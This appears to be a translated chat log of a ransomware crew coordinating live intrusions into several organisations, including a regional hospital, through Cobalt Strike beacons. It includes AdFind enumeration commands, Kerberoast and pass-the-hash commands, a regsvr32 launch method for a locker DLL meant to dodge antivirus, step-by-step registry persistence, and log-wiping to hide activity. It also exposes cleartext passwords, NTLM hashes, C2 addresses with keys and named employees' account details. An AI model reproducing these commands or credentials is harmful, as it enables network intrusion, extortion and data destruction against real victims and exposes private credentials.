I can't throw it into meter somehow
where's your map, in short
via Y
one sec
give me dir C:\windows\temp
but it doesn't show what's inside
that such a folder exists
it just tells me
dir Y:\ProgramData\
like I write to it
it wouldn't let me into the directory
it's totally crooked
I don't recall?
is there some AV on 2003*
no one seemed to be there yesterday, I'll redo it now
is there anyone interesting in the process list?
there'd be a way to play around this via PS, but it's 2003
the vulnerability was only there
damn, 2003
I did write that
I added the LA myself via MS17 on the 2003 server
none of the existing creds got into that domain with admin rights
+ the shared EA
check here the current user who got into the domain as LA
```
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
```
```
Get list of DCs in domain '' from '\\RadDC01.mcklrh.mig'.
    RADDC02.mcklrh.mig       [DS] Site: Default-First-Site-Name
    RADDC01.mcklrh.mig [PDC] [DS] Site: Default-First-Site-Name
The command completed successfully
```
from cmd
`nltest /dclist:`
now you're kidding )
I never figured out how to pull the DC list via cmd, but I suppose the smb_version output is all DCs
did you manage to get the DC list?
yes
and it sat for an hour at a time
sometimes it just hung
so in that variant files of size 0 get created?
here it's either 0 objects or ERROR: 0x1
```
AdFind.exe -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" > ad_usr.txt
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
```
remotely I did it like this
this is when I drop it
it creates 0-byte files
```
C:\ProgramData\AdFind.exe -f "(objectcategory=person)" > C:\ProgramData\ad_usr.txt
C:\ProgramData\AdFind.exe -f "objectcategory=computer" > C:\ProgramData\ad_comp.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=organizationalUnit)" > C:\ProgramData\ad_ous.txt
C:\ProgramData\AdFind.exe -subnets -f (objectCategory=subnet) > C:\ProgramData\subnets.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=group)" > C:\ProgramData\ad_group.txt
C:\ProgramData\AdFind.exe -gcb -sc trustdmp > C:\ProgramData\trustdmp.txt
```
give me the launch command + the batch file contents + the copy command
, or does it not even work like that?
are you kidding me
and dump it with wmic?
what's the problem with dropping adfind onto a trust box
yahoo
no no
AD info
I'm telling you
but what's the use
it works ))))
yes
i.e. your wmic into the trust works?
and mapped the trust to it
I've just pulled the current domain into msf
I have my own LA there
but no
via MS17?
so you have a single entry point into the trust?
without the keep flag the DLL doesn't get deleted
but there's no session
ps/rundll
the process into cobalt
neither into tpsh nor into msf
nowhere at all
pulling in the trust didn't work either
okay, got it
tried dropping the exe and the batch file into the trust domain and running them remotely
tried in the current domain specifying the trust domain / the trust domain's DC host
I described it )
how did you dump AD from the trusts?
and a last question to close this dialog
is it clear now?
and it gives me - 0 objects
I know there are at least a few computers on server Windows there
if those weren't computers
the last one could be considered true
and it spat out either an error, or hung, or 0 objects
I already tried to dump AD info this way
then I added my LA there
of the three trusts one is in quarantine; of the two remaining there's access to one; in that one I requested DA and EA via MS17
I described everything
from the trust
which ones
then how did you find the users....
the file was empty
and when it was
an error in the console
so did you get an error, or am I not getting it?
I re-dumped the trusts without output to a file, and what's the point uploading 0-byte files
you're not uploading files to the conf
haven't dumped kerbs, I'll get on it now
if 1, I re-dumped the trusts yesterday and nothing changed there; if 2, I already wrote that dumping them didn't work
as in re-dump from the current domain, or the AD info from the trusts themselves?
```
UPDATE
added a launch variant for the locker that removes some of the AV detections on drop to disk
Launch via regsvr32
regsvr32.exe /s locker.dll - without arguments
regsvr32.exe /s /n /i:"arguments here" - with arguments
```
#corp-televisa-com-mx
#pcsb-org
what do you have in progress at the moment?
thanks
waiting for the hashes
that changes everything fundamentally )
ah, well, since you pressed "don't trust"...
on the phone I did press don't trust
to charge
there are hashes from these, cleartexts in places
did you connect a personal iPhone to the work PC?
but here's what there is
I'll have to get dirty again and rummage through the conferences
I also don't have all of them left after reinstalling
I clean everything right after closing, the whole computer. I douse it with holy water.
I'm not talking about the last week
yes
wait, for the whole time working altogether?
I'm talking about all cases for the whole time )
there are 2 files in the archive, 1 - NTLM, 2 - cleartexts
I'm not downloading 40 archives )
all NTLMs into one archive
no need to mix them into one file
the main thing is split the groups identically
both formats will do
only NTLM in the file?
```
c933798f947972ca9d08ba805008d6ca
```
or will this do?
```
CORP\lkperezcer:::8d3fe083b7e1fcb6f7a069fb8d7a75f5:::
```
dead. doesn't let me in, cookies expired
collect all your NTLMs from your cases into archives for me
mine dropped - I'll try to log back in
including from public resources
your task is half an hour max - collect the biggest possible lists of clean passwords
+
you have networks in progress
good morning
so, about today's tasks
ah, all ok
That's strange
the two of you are in my network
At the base
here everywhere?
hi
Hi everyone
hi
:moyai:
that the logs are stored in the folder
yes, and the blog says so
as I understand it
and it unpacks
cobalt isn't installed through an installer
а свится
and it's unlikely the logs will be anywhere else
a bunch of folders are completely empty
only dug up logs and ubuntu backups
if you do a restart the old sessions will drop
more likely the backup lies somewhere else
is a restart an option?
could it be that the server remembers them because they were deleted while it was running?
```
root@hostname:~/cobalt/logs# ls
201203
root@hostname:~/cobalt/logs# cd 201203
root@hostname:~/cobalt/logs/201203# ls
events.log  weblog_443.log
```
the decision is on you
here I can't advise you
yes, I see
syncing beaconlog
but again
there's nothing else tied to the logs there
are you sure you cleaned those logs? )
```
root@hostname:~/cobalt/logs# rm -r *
root@hostname:~/cobalt/logs# ls
root@hostname:~/cobalt/logs#
```
к
clear this folder: `~/cobalt/logs/`
did I really need to delete all the logs for all dates?
```
root@hostname:~/cobalt/logs/201201# ls
root@hostname:~/cobalt/logs/201201#
```
the logs remained anyway
for the second and the third the logs only have info that I logged in and out
that's for the first
and the folders, rm -r *
well, I moved 2 logs to /home/, the rest rm *, done
did you delete all the logs?
on the server I deleted the contents of the 201201 folder
I have neither logs nor archives
so the logs sync together
and clean the local client too
then wipe the contents of the logs folder
fuck
it gets to 20k and starts going 1 byte per second
and not the other way around
well, the log is saved from actions in cobalt
didn't get it?
moved it to home
how is that supposed to help? I'll just log into cobalt and it'll create a new one exactly the same
throw it outside the cobalt folder
yes )))
it's a log
ah, well yes
from here `~/cobalt/logs/201201/139.62.193.40`
put it here `~/cobalt/logs`
move the log somewhere else
cursed adfind
here it is
```
beacon_1851575246.log
```
)) okay
year-month-day
and that's a date
look at the date the problem was on
```
root@hostname:~/cobalt/logs# ls
201020  201023  201026  201029  201101  201104  201107  201110  201113  201116  201119  201122  201125  201128  201201
201021  201024  201027  201030  201102  201105  201108  201111  201114  201117  201120  201123  201126  201129  201202
201022  201025  201028  201031  201103  201106  201109  201112  201115  201118  201121  201124  201127  201130  201203
```
delete everything?
tons of logs
ssh
cc
[
I didn't give you access though )
```
ssh: connect to host 104.243.40.126 port 22: Connection refused
ssh: connect to host likenic.com port 22: Connection refused
ssh: connect to host likenic.com port 38542: Connection refused
```
doesn't let me in via ssh, btw
I've got a freeze on 21556
uh-huh
give me access to the cobalt where all this shit is happening
what's with this "it doesn't work" while not trying anything to fix it?
)
well, log in via ssh
the beacon history
dead silence
where accesses there could have remained
and give me access
try logging into another cobalt
and what do we do?
brr
doesn't let me into Citrix
that's what I'm doing )
better to check from the host the accesses came from
from the same box
+ ideally on that same box altogether
)?
is the socks open in the same range as the host the logins were taken from?
don't know, haven't run into it
sonic wall, doesn't let in from our dedi, creds valid
```
https://10.0.254.1:44433/cloudBackupSettings.html
https://10.0.254.1:44433/main.html
https://10.0.254.1:44433/postlogincheck.html
text/x-snwl-prefs
text/x-snwl-prefs
```
@tl2 or are there other options for what to do?
and look at the backups
we need to look for access to their account there
I'll check the server where we found them now
from the DC
heh, no )
is the socks thrown from where the accesses were taken?
and the creds are valid
apparently only via RDP from their server
works, but doesn't let in from the dedi
i.e. you found vcenter with accesses and only AV?
well yes, possibly
when the build launches it may delete it on suspicious behavior
and won't they get deleted on static? )
some servers have 3-4 EDRs, lol
but
crypter
what starter?
and it seems nothing touches it
Well, with Defender turned off the starter won't get deleted
the main thing is that you know where to go to get into the admin panel
then we dump the browser, or RDP into his PC where there's Webroot access and do everything from there
most likely Webroot has 2FA to a phone
superlogin
great password )
10.0.0.20
```
Bitdefender
Malwarebytes Anti-Exploit
Malwarebytes' Anti-Malware
Seagull Security (no idea what this is)
```
```
UserDomain      : ITC
UserName        : superlogin
ComputerName    : ITC-DC-SVR01.ITC.LOCAL
IPAddress       : 10.0.0.14
SessionFrom     :
SessionFromName :
LocalAdmin      :
```
```
UserDomain      : ITC
UserName        : superlogin
ComputerName    : ITCMA-FILE02.ITC.LOCAL
IPAddress       : 10.0.0.38
SessionFrom     :
SessionFromName :
LocalAdmin      :
```
more effective in terms of service accounts
try hunting via sharpview - it searches differently
I already tried with the token of this superlogin itself too
with the token, yes
@user8 did you run it under a DA token? if yes it still may not work, because there will be DC authorization events, if the account is some service account
with a DA token on the DC
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe superlogin
[*] Tasked beacon to run .NET program: SharpSniper.exe superlogin
[+] host called home, sent: 113727 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
```
there's this interesting admin
```
User name                    superlogin
Full Name                    Superlogin
Comment                      User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/21/2018 9:56:11 PM
Password expires             Never
Password changeable          5/21/2018 9:56:11 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *ADSyncAdmins
Global Group memberships     *Server Management    *Discovery Management
                             *Hypervisor Access - V*Domain Users
                             *VMware Admins        *Domain Admins
                             *Records Management   *All ITC
                             *Recipient Management *Mailbox support
                             *Public Folder Managem*Organization Manageme
                             *SHOPTRAK CHINA USERS *SQL Access - FULL SER
```
on the admin accounts there's this thing on the desktop
```
screen mode id:i:2
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:24
winposstr:s:0,1,158,316,1182,1040
compression:i:1
keyboardhook:i:2
audiocapturemode:i:0
video playback mode:i:1
connection type:i:7
networkautodetect:i:1
bandwidthautodetect:i:1
displayconnectionbar:i:1
enableworkspacereconnect:i:0
disable wallpaper:i:0
allow font smoothing:i:0
allow desktop composition:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
full address:s:remote.itc-us.com
audiomode:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
redirectclipboard:i:1
redirectposdevices:i:0
autoreconnection enabled:i:1
prompt for credentials:i:0
negotiate security layer:i:1
remoteapplicationmode:i:0
alternate shell:s:
shell working directory:s:
gatewayhostname:s:
gatewayusagemethod:i:4
gatewaycredentialssource:i:4
gatewayprofileusagemethod:i:0
promptcredentialonce:i:0
gatewaybrokeringtype:i:0
use redirection server name:i:0
rdgiskdcproxy:i:0
kdcproxyname:s:
drivestoredirect:s:*
authentication level:i:2
username:s:itc\
devicestoredirect:s:*
```
when you go in there don't forget the proxy from the admin's PC
webrootanywhere.com/v1/Account/login
and where's the admin panel? outside?
@user9 @user4 @user3
https://www.ixbt.com/power/ups/multilink.shtml
on the DC
```
beacon> shell type C:\MultiLink\README.txt
[*] Tasked beacon to run: type C:\MultiLink\README.txt
[+] host called home, sent: 59 bytes
[+] received output:

README.TXT for Liebert MultiLink

Liebert developed MultiLink to protect computers from costly damage such as loss of data resulting from power failures -- from single computers to large networks. MultiLink constantly monitors one or more Liebert Uninterruptible Power Supply (UPS), warns computer users of impending power loss and initiates graceful operating system shutdowns when needed.

MultiLink on a host computer communicates with a Liebert UPS using network or direct cable connections to detect loss of utility power and the status of the UPS battery. For network communications, MultiLink employs the SNMP protocol and IP addresses. For direct cable connections, MultiLink uses either serial communications or contact closure, depending on the UPS model.

The MultiLink Advanced Shutdown version adds data analysis and notification capabilities to the standard MultiLink shutdown features. This product permits configurable responses to UPS status changes, including support for e-mail, pagers, and command actions. MultiLink Advanced Shutdown also offers data logging functionality to capture and trend historical data for trouble-shooting and analysis.

For updates to MultiLink software or to purchase the MultiLink Advance Shutdown version, visit http://multilink.liebert.com.

Technical Support:
  U.S.A               +1 800-222-5877
  Outside the U.S.A.  +1 614-841-6755
  France              +33 (0) 1 43 60 01 77
  Germany             +49 89 90 50 070
  Italy               +39 02 98250 324
  Netherlands         +31 (0) 33 2474072
  U.K.                +44 (0) 1628 403200
  Spain               +34 902 100 494
  E-mail              liebert.monitoring@emerson.com
  Web Site            http://multilink.liebert.com

The Company Behind the Products:

With over a million installations around the globe, Liebert is the world leader in computer protection systems. Since its founding in 1965, Liebert has developed a complete range of support and protection systems for sensitive electronics:
- Environmental systems: close-control air conditioning from 1.5 to 60 tons.
- Power conditioning and UPS with power ranges from 250 VA to more than 1000 kVA.
- Integrated systems that provide both environmental and power protection in a single, flexible package.
- Monitoring and control -- from systems of any size or location, on-site or remote.
- Service and support through more than 100 service centers around the world, and a 24/7 Customer Response Center.

Copyright (c) 1997-2013 Liebert Corporation. All rights reserved throughout the world. Specifications subject to change without notice. Liebert, the Liebert logo, and MultiLink are registered trademarks of Liebert Corporation.
so there it is, a bit higher up
per AD, 6956 were alive
tell me right away how many servers
I'll ping the servers again and then we start
we take the build apart and determine the method
`SIODFGO&DSIUgfsgFUT%UYESYTGU`
user8 user7 user4 user3
) in case it comes in handy after all )))
```
$krb5tgs$23$*agpm_admin$korbel.com agpmadmin
```
EDR
```
Netwrix.korbel.com [10.10.1.94] NETWRIX SERVER
URL      : https://www.netwrix.com/sign_in.html
Username : ben.mandeville@korbel.com
Password : vZjFu3cH
```
vSphere
```
https://vcenter.korbel.com/
Username : ben.mandeville@korbel.com
Password : 1234qwerASDF!@#$
```
good night
bb
k
6
okay
+2 hours
That's 14 hours worked and 10 of rest, 2 of which go to the commute
preparing to close
Why so early?
tomorrow by 4
then that's all for today
done here?
I'm finishing off the DC
99 alive, 42 restored, 42 closed\mapped\processes killed, ESXi wiped, Rubrik wiped
well, it's all coming together
```
MAIN\blove wingnut12#
MAIN\Administrator cr1spy173
MAIN\rthomas !@#monstrosity2002
```
172.93.110.218:54536 wEjNq0mz7Dji7TjM6Xv3LIovTZIndMQkbjj
```
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
ERROR: The RPC server is unavailable.
```
```
PYXIS-CCE-PROD.main.crispregional.org
ERROR: Logon failure: unknown user name or bad password.
```
```
NovaNet.main.crispregional.org
```
tasklist did not come back without an error
Admin G0F0rw@rd123!
```
10.75.0.170
10.75.0.171
10.75.0.172
10.1.0.170
10.1.0.171
10.1.0.172
```
```
crhsesxi20.main.crispregional.org
crhsesxi21.main.crispregional.org
crhsesxi22.main.crispregional.org
crhsesxi23.main.crispregional.org
crhsesxi24.main.crispregional.org
crhsesxi25.main.crispregional.org
crhsesxi26.main.crispregional.org
crhsesxi27.main.crispregional.org
```
total
```
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
NovaNet.main.crispregional.org
HISCODER.main.crispregional.org
```
not encrypted
```
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
```
```
FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispregional.org
CRR-WEB-FS01.main.crispregional.org
CRR-WEB-BG01.main.crispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org
```
pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24
```
TrinisysQA-APP.main.crispregional.org
Trinisys-A8.main.crispregional.org
Trinisys-A7.main.crispregional.org
Trinisys-A6.main.crispregional.org
Trinisys-A5.main.crispregional.org
Trinisys-A4.main.crispregional.org
Trinisys-A2.main.crispregional.org
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
PyxisPharmTest.main.crispregional.org
PyxisPharmLive.main.crispregional.org
pyxismed.main.crispregional.org
PYXIS-DB.main.crispregional.org
PYXIS-CCE-TEST.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
pyxisanest.main.crispregional.org
NovaNet.main.crispregional.org
Medisolv.main.crispregional.org
INFOTVSV5.main.crispregional.org
INFOTVSV4.main.crispregional.org
INFOTVSV3.main.crispregional.org
InfoTVsV2.main.crispregional.org
INFOTVSV1.main.crispregional.org
HISCODER.main.crispregional.org
GEPACsTestWS
GEPACS-TestCCG
GEPACS-CCG
FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispregional.org
CRR-WEB-FS01.main.crispregional.org
CRR-WEB-BG01.main.crispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org
```
not yet
so, well, did you finish them off?
10.1.21.95 10.1.21.98
```
crhsesxi24.main.crispregional.org
crhsesxi27.main.crispregional.org
```
eThoit4Rueh4aigheiDeiqua
uh-huh, so OK
```
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:/ProgramData/pshashes.txt -append -force -encoding UTF8 into 4540 (x64)
```
does the command include the hashcat parameter?
this is Invoke-Kerb, I took it from the toolchain
hashcat format?
no
got persistence
duplicate it here right away
and did you set up persistence?
sent the kerb hashes to tl2
no reply
groups and OUs aren't dumping for some reason
post in the groups you are working in
So, let's see what you did while I was away and what's been done overall
Hi!
Hi all
hi
we clean up our files and until tomorrow
then into sleep
Yes
has everyone set it up?
Until the evening
yes
by the way, did you build the DLL with the -keep flag?
1-2 each where possible
did you set it up everywhere?
```
beacon> shell reg query HKCU\Environment
[*] Tasked beacon to run: reg query HKCU\Environment
[+] host called home, sent: 57 bytes
[+] received output:

HKEY_CURRENT_USER\Environment
    Path                    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
    TEMP                    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    TMP                     REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    OneDrive                REG_EXPAND_SZ    C:\Windows\system32\config\systemprofile\OneDrive
    UserInitMprLogonScript  REG_SZ           rundll32.exe C:\Windows\Temp\STA-NURSEAL-20201020-2033.dll,entryPoint
```
- Upload the resulting DLL to a writable directory
- Right-click the session, persistence - non-elevated - userinitmprlogonscriptkey
- Enter Command: rundll32.exe C:\temp\keep64.dll,entryPoint (you MUST give the full path to the dll file, and you MUST rename the dll file before uploading to something more "organic" depending on the files around it)
- Run it
- Check that the registry entry was created with the beacon command shell reg query HKCU\Environment

1 is mandatory and 2 if everything goes well
tomorrow by 4, and tomorrow we must close 1-2 networks
set up new ones in the current networks and you can go
build it for yourselves
https://github.com/0xthirteen/StayKit
ok
or at the end of this month
or in a month
so check new ones as soon as you get them
when?
the old cobalts will be turned off later
as a matter of fact you are from England
[ ](https://mediaeveryone.com/channel/general?msg=ZxszvNDaKbZKfk3fL)
take it
grab one, whoever doesn't have one yet
```
23.106.160.195 https://topevi.com - 185.150.190.113:61718 O5xFflqDG7LDQJUDbdtkkj54zQ8QDVMMI0W
```
cobalt
```
74.118.138.108 https://wolfnew.com - 209.222.98.96:32878 onsOJxzeGz75Nt2p0tGYzjn7oTi5Eo6F644
```
Guys, write here about the VPN https://helpdocpt.club/forums/vpn.11/ who's doing what
user3 user3 @user3 💬 02:00
Domain
ing server: STAKC-DC2019.STAKC.local:389
tl1 Team Lead 1 @tl1 Admin 02:01
i.e. create a conf?
user3 user3 @user3 💬 02:01
yes
user 7,4,9,3
The one I asked you for
which one?
Will there be a conf or not?
or taken
red color
anc is not an indicator
all are anc or hanging
there is
and it seems there isn't
ok
there are still open free ones there
check further
user off
DC
```
Server Name      IP Address
-----------      ----------
FISHUSA-DC       192.168.1.91
```
EA
```
Administrator
```
DA
```
Administrator
dc-admin
djpastore3219
percona3487
```
hello team leads
```
* Username : nddevbernst
* Domain   : JDOSSN
* NTLM     : 5b622ad5d550408ed6260c2b8fb185cc
>sAMAccountName: nddevkremme
```
the creds were changed today, these are the new ones
pth JDOSSN\ndmicjsater 67595f137f5908e3ed202bc4b14aa9
what I see here in terms of escalation is just a systematic study of files/shares/accessible workstations/browser contents/cache/mail.
not kerberoast
I'm talking specifically about tickets right now
be sure to check which kerberos tickets are in memory on the accessible hosts
yes, look into the home dirs too
they even have some technical rights, as you can see
you have users here that aren't the worst, after all
look at the users' home dirs
but we can't get into them
```
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
[+] received output:
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)
[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)
[+] received output:
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)
[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)
[+] received output:
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)
[+] received output:
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)
[+] received output:
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
[+] received output:
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
[+] received output:
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
```
otherwise usually nothing can work
the servers will see other subnets and segments
look for servers.
so here the access rules are separated precisely through groups
uh-huh
right?
yes
some kind of
I can assume you can't get out of the subnet
judging by the users we have at the moment
there's a good combination shown there of impacket with lsassy with bloodhound
we'll try.
it has options for dumping lsass and decrypting it
it's good
play with the tool
it works by relying on bloodhound if it's set up correctly
well, and there's no direct path to DA
well here, lsassy
yes, there seems to be an attack plan there, but it relies on boxes that aren't visible on the network..
and with some - no =)
under certain conditions
overall it's clear there which groups are admin
well, as far as I remember it relies on the membership of managed objects if that is set
yeah, I just changed computers and it stayed on the old one
did you dump it?
yes, I already did)
I admit I don't use this thing and usually try to be careful with large ones, it will be terribly noisy
we'll try))
we can also pull bloodhound....
think it through and test the hunch)
and is there some way to find out what rights, for example, NDLEADING_Computer_Account_Admins gives
by palpating the network
and not by simply bruting, but neatly and gently
if you look closely
in general there are more buttons to push here
>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
here's another one, the girl has this group
their home dirs under their token when directly browsing the "pulled-in" directory
```
>homeDirectory: \\jdossn.local\homedirs\NDLEADING\ndcarhsherm
```
here the home dir is pulled in from the FS
these users' boxes are empty, yes
now one more peculiarity
I looked at random where this thing leads
to OU=NDLEADING and OU=SD**
I would check this user
now BACK to ad_comps
there is!
and is there an OU=NDLEADING?
now further
OU=WIRIESTERER is also an OU
that exists in ad_comps
alternative group
>memberOf: CN=WIRIESTERER_SD_Admins
there's no such thing.
SD is apparently a prefix denoting a location
let's go logically
we keep searching by hand
the most obvious - search by OU=SD
question - what is SD? we look for the answer to that
and what to come up with for password_reset ...
the one that is in the SD_Admins group
here we have this guy
look, read AD carefully
yes, I noticed too. I mostly moved through the network under the admin
or this one
```
>memberOf: CN=NDLEADING_SD_Admins,OR=Groups,OR=NDLEADING,OR=Customers,DC=jdossn,DC=local
```
look what an interesting little group, no?
>memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
```
User name                    ndcarjjohns
Full Name                    Justin Johnson
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/15/2020 7:35:46 AM
Password expires             1/7/2021 7:35:46 AM
Password changeable          10/16/2020 7:35:46 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory               \\jdossn.local\homedirs\NDLEADING\ndcarjjohns
Last logon                   10/19/2020 7:33:11 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
                             *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Users
                             *NDLEADING_All_Email
                             *NDLEADING_SD_Technicians
                             *NDLEADING_ALL
The command completed successfully.
```
```
User name                    ndcardkolst
Full Name                    Darlene Kolstad
Comment                      carrington, nd
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/20/2020 1:54:07 PM
Password expires             1/12/2021 1:54:07 PM
Password changeable          10/21/2020 1:54:07 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory               \\jdossn.local\homedirs\NDLEADING\ndcardkolst
Last logon                   10/22/2020 7:31:17 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *NDLEADING_ACCOUNTING
                             *Domain Users
                             *NDLEADING_Computer_Ac
                             *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Repor
                             *NDLEADING_EQUIP_Users
                             *NDLEADING_EQUIPRDB-FI
                             *NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email
                             *NDLEADING_ALL
                             *NDLEADING_Excel_Users
                             *NDLEADING SharePoint
                             *NDLEADING_Citrix_Loca
The command completed successfully.
```
```
User name                    ndcarhsherm
Full Name                    Hunter Sherman
Comment                      Hunter Sherman
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/20/2020 3:49:45 PM
Password expires             1/12/2021 3:49:45 PM
Password changeable          10/21/2020 3:49:45 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory               \\jdossn.local\homedirs\NDLEADING\ndcarhsherm
Last logon                   10/22/2020 9:15:49 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
                             *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule
                             *NDLEADING_All_Email
                             *NDLEADING_SD_Technicians
                             *NDLEADING_SD_Users
The command completed successfully.
```
```
User name                    ndmicjsater
Full Name                    Jason Sateren
Comment                      Michigan,ND
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/22/2020 6:49:57 AM
Password expires             1/14/2021 6:49:57 AM
Password changeable          10/23/2020 6:49:57 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory               \\jdossn.local\homedirs\NDLEADING\ndmicjsater
Last logon                   10/22/2020 7:08:15 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
                             *NDLEADING_Password_Re
                             *NDLEADING_PARTS
                             *NDLEADING_Dealer_Port
                             *NDLEADING_Computer_Ac
                             *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Repor
                             *NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule
                             *NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email
                             *NDLEADING_SD_Managers
                             *NDLEADING_EQUIP_SDK_U
                             *NDLEADING_SD_Admins
                             *NDLEADING_SD_Technicians
                             *NDLEADING SharePoint
                             *NDLEADING_ALL
                             *NDLEADING_SD_Users
                             *NDLEADING_Excel_Users
                             *NDLEADING SharePoint
                             *NDLEADING_Citrix_Loca
                             *NDLEADING_EQUIPRDB-AL
The command completed successfully.
```
```
User name                    ndcartcarr
Full Name                    Theresa Carr
Comment                      Theresa Carr
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/20/2020 11:54:49 AM
Password expires             1/12/2021 11:54:49 AM
Password changeable          10/21/2020 11:54:49 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory               \\jdossn.local\homedirs\NDLEADING\ndcartcarr
Last logon                   10/22/2020 7:02:59 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
                             *NDLEADING_Password_Re
                             *NDLEADING_Dealer_Port
                             *NDLEADING_Computer_Ac
                             *NDLEADING_All_Users
                             *NDLEADING_EQUIPRDB-SE
                             *NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule
                             *NDLEADING_All_Email
                             *NDLEADING_SD_Managers
                             *NDLEADING_SERVICE
                             *NDLEADING_ALL
                             *NDLEADING SharePoint
The command completed successfully.
```
```
User name                    nddevbernst
Full Name                    Blaine Ernst
Comment                      BLAINE ERNST
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2020 6:22:54 AM
Password expires             1/13/2021 6:22:54 AM
Password changeable          10/22/2020 6:22:54 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory               \\jdossn.local\homedirs\NDLEADING\nddevbernst
Last logon                   10/22/2020 2:16:08 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
                             *NDLEADING_Password_Re
                             *NDLEADING_Dealer_Port
                             *NDLEADING_Computer_Ac
                             *NDLEADING_All_Users
